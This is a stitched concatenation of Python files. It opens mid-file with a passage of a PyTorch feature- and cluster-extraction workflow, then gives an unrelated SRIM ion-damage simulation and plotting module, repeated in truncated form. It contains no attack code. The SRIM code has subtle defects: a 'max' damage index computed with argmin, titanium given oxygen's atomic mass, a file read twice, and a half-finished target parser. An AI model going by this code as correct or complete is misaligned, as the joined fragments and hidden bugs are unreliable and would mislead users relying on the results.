- set the model to be in train or eval phase depending on what phase we are in
- execute any optimizer update (normally learning rate updates etc at the end of
an epoch)
"""
# reset the meters at the beginning of the epoch
for meter in task.meters:
meter.reset()
# reset the loss history for this epoch
task.losses = []
# advance the epoch num to be current
task.phase_idx += 1
phase = task.phases[task.phase_idx]
task.train = True if phase["train"] else False
if task.train:
task.train_phase_idx += 1
# get a new data iterator - delete the iterator at the beginning explicitly
# so that all dataloader processes are cleaned up
phase_type = "train" if phase["train"] else "test"
# we are advancing to next epoch, so no need to compute start_iter,
# just let it to be 0 inside of recreate_data_iterator. However, if we are just
# starting from the resumed training, we want to compute_start_iter
# again (if applicable) since we recreate the data iterator and delete
# the old ones.
compute_start_iter = False
if task.checkpoint is not None and task.checkpoint["train_phase_idx"] == (
task.train_phase_idx - 1
):
compute_start_iter = True
task.recreate_data_iterator(
phase_type,
epoch=task.phase_idx,
compute_start_iter=compute_start_iter,
train_phase_idx=task.train_phase_idx,
)
# set the model to train or eval depending on what phase we are in
task.model.train(phase["train"])
if task.train and task.train_phase_idx >= 0:
task.optimizer.on_epoch(task.where)
local_rank, _ = get_machine_local_and_dist_rank()
logging.info(f"Phase advanced. Rank: {local_rank}")
def extract(
self,
output_folder: str,
extract_features: bool = True,
extract_predictions: bool = False,
) -> None:
"""
Extract workflow supports multi-gpu feature extraction and also extracting
predicted labels. Since we are only extracting features or label predictions,
only the model is built (and initialized from some model weights file
if specified by user). Optionally the meters are built if the labels
are being extracted. The model is set to the eval mode fully.
The features / labels are extracted for whatever data splits (train, val, test)
the user wants.
"""
# support feature extraction on gpu only.
assert self.task.device.type == "cuda", "Set MACHINE.DEVICE = gpu"
self.task.prepare_extraction(pin_memory=self.cfg.DATA.PIN_MEMORY)
# Create distributed model
self._add_dummy_layer()
self.task.init_distributed_data_parallel_model()
if is_primary():
logging.info(f"Model is:\n {self.task.model}")
# Get the names of the features that we are extracting. If user doesn't
# specify the features to evaluate, we get the full model output and freeze
# head/trunk both as caution.
feat_names = get_trunk_output_feature_names(self.cfg.MODEL)
if len(feat_names) == 0:
feat_names = ["heads"]
for split in self.task.available_splits:
logging.info(f"============== Split: {split} =======================")
self.task.data_iterator = iter(self.task.dataloaders[split.lower()])
if extract_features:
logging.info(f"Extracting features for partition: {split.lower()}")
self._extract_split_features(
feat_names, self.task, split, output_folder
)
logging.info(f"Done getting features for partition: {split.lower()}")
if extract_predictions:
logging.info(f"Extracting predictions for partition: {split.lower()}")
self._extract_split_label_predictions(
feat_names, self.task, split, output_folder
)
logging.info(f"Done getting predictions for partition: {split.lower()}")
self._cleanup_task()
def _to_unique_feature_names(self, feat_names: List[str]) -> List[str]:
"""
We may have multiple head with different average pooling for
the same features. In case of export, we want to make sure to
export the outputs of these heads with different names.
This function will rename the features in the following way:
["res4", "res4", "res5"] -> ["res4", "res4_1", "res5"]
No effect if there are no duplicate feature names.
"""
counter = {}
new_feat_names = []
for feat_name in feat_names:
index = counter.get(feat_name, 0)
if index > 0:
new_feat_names.append(f"{feat_name}_{index}")
else:
new_feat_names.append(feat_name)
counter[feat_name] = index + 1
return new_feat_names
def _extract_split_label_predictions(
self,
feat_names: List[str],
task: ClassyTask,
split_name: str,
output_folder: str,
):
task.model.eval()
logging.info("Model set to eval mode during feature extraction...")
dist_rank = torch.distributed.get_rank()
feat_names = self._to_unique_feature_names(feat_names)
out_predictions, out_targets, out_scores = {}, {}, {}
for feat_name in feat_names:
out_predictions[feat_name] = {}
out_scores[feat_name] = {}
out_targets[feat_name] = {}
assert len(task.meters) > 0, "Please specify one meter to extract predictions"
assert len(task.meters) == 1, "Please use only one meter to extract predictions"
for meter in task.meters:
assert hasattr(
meter, "get_predictions"
), f"Meter {meter.name} doesn't implement get_predictions function"
for count in itertools.count(start=0, step=1):
try:
if count % 100 == 0:
logging.info(f"Label prediction extraction iteration: {count}")
sample = next(task.data_iterator)
assert isinstance(sample, dict)
assert "data_idx" in sample, "Indices not passed"
input_sample = {
"input": torch.cat(sample["data"]).cuda(non_blocking=True),
"target": torch.cat(sample["label"]).cpu().numpy(),
"inds": torch.cat(sample["data_idx"]).cpu().numpy(),
}
with torch.no_grad():
model_output = task.model(input_sample["input"])
# get the model predictions using the meter
if isinstance(model_output, list):
model_output_cpu = [x.cpu() for x in model_output]
else:
model_output_cpu = model_output.cpu()
for meter in task.meters:
meter.update(
model_output_cpu, sample["label"][0].detach().cpu()
)
predictions, pred_scores = task.meters[0].get_predictions(
model_output_cpu
)
num_images = input_sample["inds"].shape[0]
for num, layer_name in enumerate(feat_names):
pred = predictions[num]
score = pred_scores[num]
targets = input_sample["target"]
for idx in range(num_images):
index = input_sample["inds"][idx]
if not (index in out_predictions[layer_name]):
out_targets[layer_name][index] = targets[idx].reshape(
-1
)
out_predictions[layer_name][index] = pred[idx]
out_scores[layer_name][index] = score[idx]
except StopIteration:
break
# print the meters results. This can offer a validation
# of the extracted predictions.
self._sync_and_print_meters(task)
# save the predictions, targets and image indices now
self._save_extracted_label_predictions(
predictions=out_predictions,
confidence_scores=out_scores,
targets=out_targets,
dist_rank=dist_rank,
split=split_name,
output_folder=output_folder,
)
@staticmethod
def _save_extracted_label_predictions(
predictions,
confidence_scores,
targets,
dist_rank: int,
split: str,
output_folder: str,
):
output = {}
for layer_name in predictions.keys():
predictions[layer_name] = dict(sorted(predictions[layer_name].items()))
targets[layer_name] = dict(sorted(targets[layer_name].items()))
confidence_scores[layer_name] = dict(
sorted(confidence_scores[layer_name].items())
)
preds = np.array(torch.stack(list(predictions[layer_name].values())))
scores = np.array(torch.stack(list(confidence_scores[layer_name].values())))
N = preds.shape[0]
output[layer_name] = {
"predictions": preds.reshape(N, -1),
"confidence_scores": scores.reshape(N, -1),
"targets": np.array(list(targets[layer_name].values())),
"inds": np.array(list(predictions[layer_name].keys())),
}
split = split.lower()
for layer_name, layer_prediction in output.items():
out_pred_file = (
f"{output_folder}/rank{dist_rank}_{split}_{layer_name}_predictions.npy"
)
out_scores_file = (
f"{output_folder}/rank{dist_rank}_{split}_{layer_name}_conf_scores.npy"
)
out_target_file = (
f"{output_folder}/rank{dist_rank}_{split}_{layer_name}_targets.npy"
)
out_inds_file = (
f"{output_folder}/rank{dist_rank}_{split}_{layer_name}_inds.npy"
)
logging.info(
f"For {layer_name}, "
f"saving predictions: {layer_prediction['predictions'].shape}, "
f"saving scores: {layer_prediction['confidence_scores'].shape}, "
f"targets: {layer_prediction['targets'].shape}, "
f"inds: {layer_prediction['inds'].shape}"
)
save_file(layer_prediction["predictions"], out_pred_file)
save_file(layer_prediction["confidence_scores"], out_scores_file)
save_file(layer_prediction["targets"], out_target_file)
save_file(layer_prediction["inds"], out_inds_file)
def _sync_and_print_meters(self, task):
for meter in task.meters:
meter.sync_state()
logging.info("Meters synced")
if is_primary():
rank, _ = get_machine_local_and_dist_rank()
for meter in task.meters:
if len(task.meters) > 0 and (
(task.train and task.config["METERS"]["enable_training_meter"])
or (not task.train)
):
meter_value = meter.value
metric_key = f"{meter.name}"
if metric_key not in task.metrics:
task.metrics[metric_key] = []
task.metrics[metric_key].append(meter_value)
logging.info(
f"Rank: {rank}, name: {metric_key}, value: {meter_value}"
)
@staticmethod
def _flatten_features_list(features: Dict[str, Any]):
assert isinstance(features, list), "features must be of type list"
is_nested = isinstance(features[0], list)
if is_nested:
flat_features_list = [item for sublist in features for item in sublist]
return flat_features_list
return features
@staticmethod
def _save_extracted_features(
features,
targets,
dist_rank: int,
chunk_index: int,
split: str,
output_folder: str,
):
output = {}
for layer_name in features.keys():
indices = sorted(features[layer_name].keys())
if len(indices) > 0:
output[layer_name] = {
"inds": np.array(indices),
"features": np.array([features[layer_name][i] for i in indices]),
"targets": np.array([targets[layer_name][i] for i in indices]),
}
for layer_name, layer_features in output.items():
out_feat_file = os.path.join(
output_folder,
f"rank{dist_rank}_chunk{chunk_index}_{split.lower()}_{layer_name}_features.npy",
)
out_target_file = os.path.join(
output_folder,
f"rank{dist_rank}_chunk{chunk_index}_{split.lower()}_{layer_name}_targets.npy",
)
out_inds_file = os.path.join(
output_folder,
f"rank{dist_rank}_chunk{chunk_index}_{split.lower()}_{layer_name}_inds.npy",
)
save_file(layer_features["features"], out_feat_file)
save_file(layer_features["targets"], out_target_file)
save_file(layer_features["inds"], out_inds_file)
def _extract_split_features(
self,
feat_names: List[str],
task: ClassyTask,
split_name: str,
output_folder: str,
):
task.model.eval()
logging.info("Model set to eval mode during feature extraction...")
dist_rank = torch.distributed.get_rank()
out_features, out_targets = {}, {}
for feat_name in feat_names:
out_features[feat_name], out_targets[feat_name] = {}, {}
chunk_index = 0
feature_buffer_size = 0
while True:
try:
sample = next(task.data_iterator)
assert isinstance(sample, dict)
assert "data_idx" in sample, "Indices not passed"
input_sample = {
"input": torch.cat(sample["data"]).cuda(non_blocking=True),
"target": torch.cat(sample["label"]).cpu().numpy(),
"inds": torch.cat(sample["data_idx"]).cpu().numpy(),
}
with torch.no_grad():
features = task.model(input_sample["input"])
flat_features_list = self._flatten_features_list(features)
num_images = input_sample["inds"].shape[0]
feature_buffer_size += num_images
for num, feat_name in enumerate(feat_names):
feature = flat_features_list[num].cpu().numpy()
targets = input_sample["target"]
for idx in range(num_images):
index = input_sample["inds"][idx]
out_features[feat_name][index] = feature[idx]
out_targets[feat_name][index] = targets[idx].reshape(-1)
if (
feature_buffer_size
>= self.cfg.EXTRACT_FEATURES.CHUNK_THRESHOLD
>= 0
):
self._save_extracted_features(
features=out_features,
targets=out_targets,
dist_rank=dist_rank,
chunk_index=chunk_index,
split=split_name,
output_folder=output_folder,
)
for layer_name in out_features.keys():
out_features[layer_name].clear()
chunk_index += 1
feature_buffer_size = 0
except StopIteration:
self._save_extracted_features(
features=out_features,
targets=out_targets,
dist_rank=dist_rank,
chunk_index=chunk_index,
split=split_name,
output_folder=output_folder,
)
break
def _add_dummy_layer(self):
"""
In case of feature evaluation mode, if we are freezing both trunk and
head, DDP won't work as there are no parameters in the model. Adding
the dummy head will lead to features being not right. So we rather
add the dummy layer to the model and use DDP. We copy the model to
gpu (if using gpus) after the new dummy layer addition.
"""
fully_frozen_model = self.task.base_model.is_fully_frozen_model()
if fully_frozen_model:
self.task.base_model.dummy_layer = torch.nn.Linear(4, 4)
if self.task.device.type == "cuda":
self.task.base_model = copy_model_to_gpu(self.task.base_model)
def _cleanup_task(self):
if hasattr(self.task, "data_iterator"):
del self.task.data_iterator
gc.collect()
if hasattr(self.task, "dataloaders"):
del self.task.dataloaders
gc.collect()
def extract_clusters(self) -> Dict[str, Dict[int, int]]:
"""
Workflow to extract multi-gpu cluster extraction for pre-trained models
based on clusterization (SwAV, DeepCluster, etc).
The function returns a map from image index to cluster index for the
whole dataset for each of the different splits.
"""
# Support feature extraction on gpu only.
assert self.task.device.type == "cuda", "Set MACHINE.DEVICE = gpu"
self.task.prepare_extraction(pin_memory=self.cfg.DATA.PIN_MEMORY)
# Assert that the model support extract of clusters
error_message = "Extracting clusters is only available for pre-training methods based on clusters" # NOQA
assert self.task.base_model.is_clustering_model(), error_message
# Create distributed model
self._add_dummy_layer()
self.task.init_distributed_data_parallel_model()
if is_primary():
logging.info("Model is:\n {}".format(self.task.model))
# Compute the cluster assignment on each worker in parallel
cluster_assignment = {}
for split in self.task.available_splits:
msg = f"Extracting cluster assignment for partition: {split}"
logging.info(msg)
cluster_assignment[split] = self._get_cluster_assignment_for_split(
self.task, split
)
logging.info("Done: " + msg)
self._cleanup_task()
# Merge the cluster assignments and group by cluster
return self._merge_cluster_assignments(cluster_assignment)
def _get_cluster_assignment_for_split(self, task: ClassyTask, split: str):
task.model.eval()
logging.info("Model set to eval mode during feature extraction...")
cluster_assignments = {}
task.data_iterator = iter(self.task.dataloaders[split.lower()])
while True:
try:
sample = next(task.data_iterator)
assert isinstance(sample, dict)
assert "data_idx" in sample, "Indices not passed"
input_sample = {
"images": torch.cat(sample["data"]).cuda(non_blocking=True),
"indices": torch.cat(sample["data_idx"]).cpu().numpy(),
}
with torch.no_grad():
features = task.model(input_sample["images"])
features = features[0]
prototype_score = features[1]
prototype_index = prototype_score.argmax(dim=-1)
num_images = input_sample["indices"].shape[0]
for idx in range(num_images):
image_index = input_sample["indices"][idx]
cluster_assignments[image_index] = prototype_index[idx].item()
except StopIteration:
break
return cluster_assignments
@staticmethod
def _merge_cluster_assignments(
rank_cluster_assignment: Dict[str, Dict[int, int]]
) -> Dict[str, Dict[int, int]]:
"""
All gather all the cluster assignments computed by the different workers on
separate parts of the dataset and merge them in a single map
"""
merged_cluster_assignments = {}
for split in rank_cluster_assignment.keys():
split_assignments = list(rank_cluster_assignment[split].items())
image_indices = [assignment[0] for assignment in split_assignments]
image_indices = torch.LongTensor(image_indices).cuda(
torch.cuda.current_device()
)
cluster_indices = [assignment[1] for assignment in split_assignments]
cluster_indices = torch.LongTensor(cluster_indices).cuda(
torch.cuda.current_device()
)
sizes = all_gather_sizes(image_indices)
all_image_indices = all_gather_heterogeneous(sizes, image_indices)
all_cluster_indices = all_gather_heterogeneous(sizes, cluster_indices)
merged_cluster_assignments[split] = {}
for image_indices, cluster_indices in zip(
all_image_indices, all_cluster_indices
):
for image_id, cluster_id in zip(image_indices, cluster_indices):
merged_cluster_assignments[split][
image_id.item()
] = cluster_id.item()
return merged_cluster_assignments
|
from __future__ import annotations
import json
import pickle
import matplotlib.pyplot as plt
import numpy as np
from datetime import datetime
from pathlib import Path
import os
from srim import Ion, Layer, Target # , output
from srim.srim import TRIM
from srim.output import Results
from concurrent.futures import as_completed, ProcessPoolExecutor
import multiprocessing as mp
from time import sleep
from dataclasses import asdict # , dataclass as dc
from pydantic.dataclasses import dataclass
from typing import cast, Iterable, Sequence, Set, Union, List, Tuple, Dict, NamedTuple
from typing_extensions import Literal, TypedDict
from mytypes import floatArray, precisionLitType
from matplotlib import use
use('Agg') # NoQa
class PydanticConfig:
arbitrary_types_allowed = True
@dataclass(config=PydanticConfig)
class SrimData:
folder: Path # folder the results is saved to
ion: Ion
num_ion: int
target: Target
damage_total: float
damage_array: floatArray
def __post_init__(self) -> None:
...
def __post_init_post_parse__(self) -> None:
self.results = Results(self.folder)
import re
if not self.ion:
self.ion = self.results.ioniz.ion
self.num_ions: int = self.results.ioniz.num_ions
if not self.target:
with open(R".\data\ceria_on_silica\ceria_2um_He@400keV\tdata.txt", 'r') as f:
f.read()
"""===============Target material =======================
Layer 1 """
match_target = re.search(r'(?<=====\r\n)Layer\s+\d+\s+:.*?(?=====)', f.read(), re.DOTALL)
#match_target = re.search(r'(?<=====\r\n)Layer\s+\d+\s+:.*?(?=====)', f.read(), re.DOTALL)
if match_target:
print(match_target.group(0))
else:
print("target not found")
# out = output.SRIM_Output()
# output.SRIM_Output._read_target(out, f.read())
# self.target = Target.
# self.layers: List[Layer] = self.target.layers
class ElemTD(TypedDict):
atomic_num: int
atomic_mass: float
E_d: float
lattice: float
surface: float
@dataclass(frozen=True)
class ElemClass:
atomic_num: int
atomic_mass: float
E_d: float = 25.0
lattice: float = 0.0
surface: float = 3.0
def __post_init__(self) -> None:
if self.E_d <= 0:
raise ValueError('Invalid E_d (negative)')
assert self.lattice >= 0
def as_dict(self) -> Dict[str, float]:
# narrow str, Any to declared dtypes
# get types from self.__annotation__ and make union in another function?
return asdict(self)
def as_typdict(self) -> ElemTD:
#dic = {str(k): float(v) for k, v in asdict(self).items()}
#ret: ElemTD = dic
#ret = cast(ElemTD, asdict(self))
return ElemTD(atomic_num=self.atomic_num,
atomic_mass=self.atomic_mass,
E_d=self.E_d,
lattice=self.lattice,
surface=self.surface)
class DamageStats(NamedTuple):
total: float
max_damage: float
max_index: int
max_depth: float
# TODO see main.py for getting element classes. Need to convert to ElemClass or not? Use Dacite for convert via dict?
# or inherit from it?
elem_ce_dict = ElemClass(E_d=25.0, lattice=3.0, surface=4.23, atomic_num=58, atomic_mass=140.1)
elem_u_dict = {'E_d': 25.0, 'lattice': 3.0, 'surface': 5.42, 'atomic_num': 92, 'atomic_mass': 238.0}
elem_th_dict = {'E_d': 25.0, 'lattice': 3.0, 'surface': 5.93, 'atomic_num': 90, 'atomic_mass': 232.0}
elem_o_dict = ElemClass(E_d=28.0, lattice=3.0, surface=2.00, atomic_num=8, atomic_mass=15.99)
elem_si_dict = {'E_d': 15.0, 'lattice': 2.0, 'surface': 4.70, 'atomic_num': 14, 'atomic_mass': 28.08}
elem_ti_dict = {'E_d': 28.0, 'lattice': 3.0, 'surface': 2.00, 'atomic_num': 22, 'atomic_mass': 15.99}
def make_element_subfolder_name(layer: Layer, ion: Ion,
precision: precisionLitType = 'um') -> Path:
"""create a folder from layer elements and stoichiometries and ion type and energy.
precision is units of the layer width, default = 'um' """
if layer.name:
element_list_str = layer.name
else:
element_list = []
for (element, prop) in layer.elements.items():
stoich = prop['stoich']
# print(element.symbol, stoich)
if stoich == 1.0:
element_str = element.symbol
elif stoich.is_integer():
element_str = f'{element.symbol}{stoich:.0f}'
else:
element_str = f'{element.symbol}{stoich:.2f}'
# print(element_str)
element_list.append(element_str)
element_list_str = "-".join(element_list)
# print(element_list_str)
layer_width_nm = f'{layer.width / 10:.0f}nm'
layer_width_um = f'{layer.width / 10000:.0f}um'
ion_energy_kev = f'{ion.energy / 1000:.0f}keV'
if precision == 'um' or precision == 'micro':
layer_width = layer_width_um
elif precision == 'nm' or precision == 'nano':
layer_width = layer_width_nm
else:
layer_width = layer.width
data_subfolder_name = Path(f"{element_list_str}_{layer_width}_{ion.symbol}@{ion_energy_kev}")
# print(data_subfolder_name)
return data_subfolder_name
def make_data_path(layer: Layer,
ion: Ion,
data_path: Union[Path, str] = R'.\data',
precision: precisionLitType = 'um') -> Path:
"""create a folder from layer elements and stoichiometries and ion type and energy
data_path default = '.\\data'. precision is units of the layer width, default = 'um' """
data_subfolder_name = make_element_subfolder_name(layer, ion, precision)
output_directory: Path = Path(data_path) / data_subfolder_name
output_directory.mkdir(parents=True, exist_ok=True)
return output_directory
def make_image_path(layer: Layer, ion: Ion,
image_path: Union[Path, str] = R'.\images',
precision: precisionLitType = 'um') -> Path:
"""create a folder from layer elements and stoichiometries and ion type and energy
data_path default = '.\\images'. precision is units of the layer width, default = 'um' """
data_subfolder_name = make_element_subfolder_name(layer, ion, precision)
outimage_directory: Path = Path(image_path) / data_subfolder_name
outimage_directory.mkdir(parents=True, exist_ok=True)
return outimage_directory
def get_depth_damage_array(results: Results, units: str = 'nm') -> floatArray:
"""get array of [0] depths in nm and [damage] for whole target"""
if units in ('nm', 'nano'):
ratio_A_to_units = 10
elif units in ('a', 'A', 'angstrom', 'angstroms', 'Angstrom', 'Angstroms'):
ratio_A_to_units = 1
else:
raise ValueError
phon = results.phonons
dx = max(phon.depth) / 100 # ratio for eV/A to eV per measurement
energy_damage = np.array((phon.ions + phon.recoils) * dx)
depth_array = np.array(phon.depth / ratio_A_to_units)
damage_array_nm: np.ndarray[float] = np.stack((depth_array, energy_damage))
return damage_array_nm
def trunc_depth_damage_array(results: Results, units: precisionLitType = 'nm', depth: int = 0) -> floatArray:
"""Get list of damage up to given depth. <depth> given in <units>"""
depth_damage_array = get_depth_damage_array(results, units=units)
if depth > 0:
# print(depth_damage_array[0][depth_damage_array[0][:] <= depth])
depth_damage = depth_damage_array[:, depth_damage_array[0][:] <= depth]
else:
depth_damage = depth_damage_array[:]
return cast(floatArray, depth_damage) # up to depth if given otherwise all
def get_damage_array(results: Results, units: precisionLitType = 'nm', depth: int = 0) -> floatArray:
depth_damage = trunc_depth_damage_array(results, units=units, depth=depth)
damage_array = depth_damage[1]
return cast(floatArray, damage_array)
def get_damage_stats(results: Results, units: precisionLitType = 'nm', depth: int = 0) -> DamageStats:
array = trunc_depth_damage_array(results, units=units, depth=depth)
total_damage: int = int(sum(cast(Iterable[float], array[1])))
max_damage: int = int(max(array[1]))
max_ind: int = np.argmin(array[1])
depth_of_max: float = cast(float, array[0][max_ind])
return DamageStats(total_damage, max_damage, max_ind, depth_of_max)
def plot_damage_multi(results: List[Results],
save_dir: Path,
units: precisionLitType = 'nm',
depth: int = 0
) -> None:
# phon = results.phonons
if units in ('nm', 'nano'):
units_str = 'nm'
elif units in ('a', 'A', 'angstrom', 'angstroms', 'Angstrom', 'Angstroms'):
units_str = 'Angstroms'
if depth > 0:
pass
# add doted line at depth
if isinstance(results, Results):
results = [results]
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlabel(f'Depth [{units_str}]')
ax.set_ylabel('Collision damage [eV]')
for res in results:
depth_damage_array = trunc_depth_damage_array(res, units=units, depth=depth)
damage_stats = get_damage_stats(res, units=units, depth=depth)
ion_name = res.ioniz.ion.symbol
ion_energy = int(res.ioniz.ion.energy / 1000)
legend = f'{ion_name} @ {ion_energy} keV, damage {damage_stats.total} eV'
ax.plot(depth_damage_array[0], depth_damage_array[1], label='{}'.format(legend))
ax.legend()
fig.suptitle('Damage Energy vs. Depth', fontsize=15)
fig.set_size_inches((10, 6))
fig.savefig(os.path.join(save_dir, 'damagevsdepth_multi.png'), transparent=True)
# return fig
def plot_damage_multi_from_path(data_parent: Path,
units: precisionLitType = 'nm',
depth: int = 0,
) -> None:
loaded_data = [Results(dp) for dp in data_parent.iterdir() if dp.is_dir()]
plot_damage_multi(loaded_data, data_parent, units=units, depth=depth)
def plot_damage_energy_per_ion(results: Results, folder: Path, units: precisionLitType = 'nm') -> None:
phon = results.phonons
if units in ('nm', 'nano'):
units_str = 'nm'
depth = phon.depth / 10
elif units in ('a', 'A', 'angstrom', 'angstroms', 'Angstrom', 'Angstroms'):
units_str = 'Angstroms'
depth = phon.depth
fig, ax = plt.subplots()
energy_damage: floatArray = get_damage_array(results, units, 0)
energy_damage_sum = sum(energy_damage)
# energy_damage_kev = energy_damage_sum / 1000
# ax.plot(depth, energy_damage / phon.num_ions, label='{}'.format(folder))
legend = f'{folder.name}, {energy_damage_sum} eV'
ax.plot(depth, energy_damage / phon.num_ions, label='{}'.format(legend))
ax.set_xlabel(f'Depth [{units_str}]')
ax.set_ylabel('Collision damage [eV / ion]')
ax.legend()
fig.suptitle('Damage Energy vs. Depth', fontsize=15)
fig.set_size_inches((10, 6))
fig.savefig(os.path.join(folder, 'damagevsdepth_per_ion.png'), transparent=True)
def plot_damage_energy_total(results: Results, folder: Path, units: precisionLitType = 'nm') -> None:
phon = results.phonons
if units in ('nm', 'nano'):
units_str = 'nm'
depth = phon.depth / 10
elif units in ('a', 'A', 'angstrom', 'angstroms', 'Angstrom', 'Angstroms'):
units_str = 'Angstroms'
depth = phon.depth
fig, ax = plt.subplots()
energy_damage: floatArray = get_damage_array(results, units, 0)
energy_damage_sum: float = sum(cast(Iterable[float], energy_damage))
# energy_damage_kev = energy_damage_sum / 1000
# ax.plot(depth, energy_damage / phon.num_ions, label='{}'.format(folder))
legend = f'{folder.name}, {energy_damage_sum} eV'
ax.plot(depth, energy_damage, label='{}'.format(legend))
ax.set_xlabel(f'Depth [{units_str}]')
ax.set_ylabel(f'Collision damage [eV] (total from {phon.num_ions} ions')
ax.legend()
fig.suptitle('Damage Energy vs. Depth', fontsize=15)
fig.set_size_inches((10, 6))
fig.savefig(os.path.join(folder, 'damagevsdepth_total.png'), transparent=True)
def run_srim(ion: Ion,
target: Target,
data_out_dir: Path,
num_ions: int, srim_dir: Path) -> Results:
# use layer, data_path and iob to create out_dir
# run trim, return out_dir and result
# copy result to out_dir from srim_dir
trim = TRIM(target, ion, number_ions=num_ions, calculation=1) # 1 million -> about 5 hours
results = trim.run(srim_dir)
TRIM.copy_output_files(srim_dir, data_out_dir)
print(f'{ion.symbol}-{ion.energy/1000}kev done')
return results
def plot_srim(results: Results,
image_out_dir: Path,
units: precisionLitType = 'nm',
total: bool = True,
per_ion: bool = True,
) -> None:
if total:
plot_damage_energy_total(results, image_out_dir, units=units)
if per_ion:
plot_damage_energy_per_ion(results, image_out_dir, units=units)
def combined_srim(ion: Ion,
target: Target,
data_path: Path,
num_ions: int,
srim_dir: Path) -> SrimData:
# run ions in list against layer and datapath
# get out_dir and result
# create list of folders and list of results
start = datetime.now()
pid = os.getpid() # if using processpool
data_out_dir = make_data_path(target.layers[0], ion, data_path)
image_out_dir = data_out_dir # make_image_path(target.layers[0], ion, data_path)
print(f"{data_out_dir.name} started) using PID {pid}")
result = run_srim(ion, target, data_out_dir, num_ions, srim_dir)
damage_stats = get_damage_stats(result)
damage_total = damage_stats.total
damage_array = get_depth_damage_array(result)
plot_srim(result, image_out_dir)
datum = SrimData(data_out_dir, ion, num_ions, target, damage_total, damage_array)
end = datetime.now()
duration = end - start
print(f"{data_out_dir.name} done in {str(duration).split(".", 2)[0]}") # " using PID {pid}")
return datum
def create_ion_list(ion_name: Literal['H', 'He', 'Li'],
energy_list: Union[Sequence[int], Set[int]],
units: Literal['ev', 'kev', 'mev']
) -> List[Ion]:
ion_list = [Ion(f'{ion_name}', energy=x * 1000) for x in energy_list]
return ion_list
def pool_srim(ions: Union[Sequence[Ion], Set[Ion]],
target: Target, data_path: Path, num_ions: int, srim_dir: Path) -> List[SrimData]: # List[SrimData]
# with ProcessPoolExecutor(max_workers=mp.cpu_count() - 1) as ppexc:
with ProcessPoolExecutor(max_workers=mp.cpu_count() * 5) as ppexc:
"""# using submit() and list comprehension
SrimData_futures = [ppexc.submit(combined_srim,
ion,
target,
data_path,
num_ions=1_000_000, # 1 million -> about 5 hours
srim_dir=srim_executable_directory)
for ion in ions_He_list]
"""
SrimData_futures = []
for ion in ions:
res = ppexc.submit(combined_srim,
ion,
target,
data_path,
num_ions, # 1 million -> about 5 hours
srim_dir)
sleep(1)
SrimData_futures.append(res)
"""
# alternate using map() and repeat(). # returns results in order done
SrimData_futures = ppexc.map(combined_srim,
[Ion('He', energy=1000000), Ion('He', energy=2000000)],
repeat(target),
repeat(data_path),
repeat(1_000_000), # 1 million -> about 5 hours
repeat(srim_executable_directory))
"""
Srim_data_list: List[SrimData] = [f.result() for f in as_completed(SrimData_futures)]
print(f"{len(Srim_data_list)} jobs done")
return Srim_data_list
def pickle_srim(srimdata: Union[SrimData, Sequence[SrimData]]) -> None:
# sequence or iterable?
if isinstance(srimdata, SrimData):
srimdata = [srimdata]
for srim_x in srimdata:
datapath = srim_x.folder / "result.pkl"
with open(datapath, "w+b") as pkl_f:
pickle.dump(srim_x, pkl_f)
print(f"Data pickled to {datapath}")
def json_srim(srimdata: List[SrimData]) -> None:
data_ref = srimdata if isinstance(srimdata, SrimData) else srimdata[0]
datapath = data_ref.folder.parent / "result.json"
with open(datapath, "w+") as json_f:
json.dump(srimdata, json_f)
print(f"Data save as json to {datapath}")
| from __future__ import annotations
import json
import pickle
import matplotlib.pyplot as plt
import numpy as np
from datetime import datetime
from pathlib import Path
import os
from srim import Ion, Layer, Target # , output
from srim.srim import TRIM
from srim.output import Results
from concurrent.futures import as_completed, ProcessPoolExecutor
import multiprocessing as mp
from time import sleep
from dataclasses import asdict # , dataclass as dc
from pydantic.dataclasses import dataclass
from typing import cast, Iterable, Sequence, Set, Union, List, Tuple, Dict, NamedTuple
from typing_extensions import Literal, TypedDict
from mytypes import floatArray, precisionLitType
from matplotlib import use
use('Agg') # NoQa
class PydanticConfig:
arbitrary_types_allowed = True
@dataclass(config=PydanticConfig)
class SrimData:
folder: Path # folder the results is saved to
ion: Ion
num_ion: int
target: Target
damage_total: float
damage_array: floatArray
def __post_init__(self) -> None:
...
def __post_init_post_parse__(self) -> None:
self.results = Results(self.folder)
import re
if not self.ion:
self.ion = self.results.ioniz.ion
self.num_ions: int = self.results.ioniz.num_ions
if not self.target:
with open(R".\data\ceria_on_silica\ceria_2um_He@400keV\tdata.txt", 'r') as f:
f.read()
"""===============Target material =======================
Layer 1 """
match_target = re.search(r'(?<=====\r\n)Layer\s+\d+\s+:.*?(?=====)', f.read(), re.DOTALL)
#match_target = re.search(r'(?<=====\r\n)Layer\s+\d+\s+:.*?(?=====)', f.read(), re.DOTALL)
if match_target:
print(match_target.group(0))
else:
print("target not found")
# out = output.SRIM_Output()
# output.SRIM_Output._read_target(out, f.read())
# self.target = Target.
# self.layers: List[Layer] = self.target.layers
class ElemTD(TypedDict):
atomic_num: int
atomic_mass: float
E_d: float
lattice: float
surface: float
@dataclass(frozen=True)
class ElemClass:
atomic_num: int
atomic_mass: float
E_d: float = 25.0
lattice: float = 0.0
surface: float = 3.0
def __post_init__(self) -> None:
if self.E_d <= 0:
raise ValueError('Invalid E_d (negative)')
assert self.lattice >= 0
def as_dict(self) -> Dict[str, float]:
# narrow str, Any to declared dtypes
# get types from self.__annotation__ and make union in another function?
return asdict(self)
def as_typdict(self) -> ElemTD:
#dic = {str(k): float(v) for k, v in asdict(self).items()}
#ret: ElemTD = dic
#ret = cast(ElemTD, asdict(self))
return ElemTD(atomic_num=self.atomic_num,
atomic_mass=self.atomic_mass,
E_d=self.E_d,
lattice=self.lattice,
surface=self.surface)
class DamageStats(NamedTuple):
total: float
max_damage: float
max_index: int
max_depth: float
# TODO see main.py for getting element classes. Need to convert to ElemClass or not? Use Dacite for convert via dict?
# or inherit from it?
elem_ce_dict = ElemClass(E_d=25.0, lattice=3.0, surface=4.23, atomic_num=58, atomic_mass=140.1)
elem_u_dict = {'E_d': 25.0, 'lattice': 3.0, 'surface': 5.42, 'atomic_num': 92, 'atomic_mass': 238.0}
elem_th_dict = {'E_d': 25.0, 'lattice': 3.0, 'surface': 5.93, 'atomic_num': 90, 'atomic_mass': 232.0}
elem_o_dict = ElemClass(E_d=28.0, lattice=3.0, surface=2.00, atomic_num=8, atomic_mass=15.99)
elem_si_dict = {'E_d': 15.0, 'lattice': 2.0, 'surface': 4.70, 'atomic_num': 14, 'atomic_mass': 28.08}
